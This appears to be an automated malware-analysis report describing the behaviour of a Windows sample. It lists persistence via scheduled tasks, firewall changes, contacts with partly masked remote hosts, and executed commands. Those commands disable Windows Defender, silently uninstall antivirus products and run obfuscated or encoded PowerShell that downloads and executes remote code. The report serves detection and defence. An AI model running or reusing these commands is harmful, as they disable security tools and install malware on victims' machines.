Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\blackball
- <SYSTEM32>\tasks\uswmuhtt
- <SYSTEM32>\tasks\oe5llcofu\f98icvmfqkg
- <SYSTEM32>\tasks\microsoft\windows\c4gyjxcr3w\qrrycwy
- <SYSTEM32>\tasks\pjdz
- <SYSTEM32>\tasks\nodcnnjj
Malicious functions
Executes the following
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 DNSd
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 SDNSd
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
Modifies file system
Creates the following files
- %WINDIR%\temp\svchost.exe
- %WINDIR%\temp\ipc.txt
- %WINDIR%\pjdz.exe
Network activity
Connects to
- 'localhost':43669
TCP
HTTP GET requests
- http://t.##ynx.com/gim.jsp
- http://t.##ynx.com/a.jsp?gi#############################################################################
UDP
- DNS ASK t.##ynx.com
- DNS ASK microsoft.com
- DNS ASK t.##3r0.com
- DNS ASK t.##r9g.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' /c echo JnYkmlG >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -Exclu...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c echo JnYkmlG >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -Exclu...
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa /F
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa1 /F
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa2 /F
- '<SYSTEM32>\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
- '<SYSTEM32>\schtasks.exe' /run /tn MicroSoft\Windows\C4GyJXcR3w\QRrycwY
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\C4GyJXcR3w\QRrycwY /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn Oe5lLcofu\F98icVmfQKG
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn Oe5lLcofu\F98icVmfQKG /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...
- '<SYSTEM32>\schtasks.exe' /run /tn \USWMuHtT
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \USWMuHtT /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
- '<SYSTEM32>\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Norton Security%'" call uninstall /nointeractive
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn PjDZ /tr "%WINDIR%\PjDZ.exe" /F
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Security%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%avp%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%avast%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Eset%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAH...
- '<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess <SYSTEM32>\WindowsPowerShell 1.0\powershell.exe
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%AntiVirus%'" call uninstall /nointeractive
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\nodcNnjj" /tr "%WINDIR%\TmRq.exe" /F
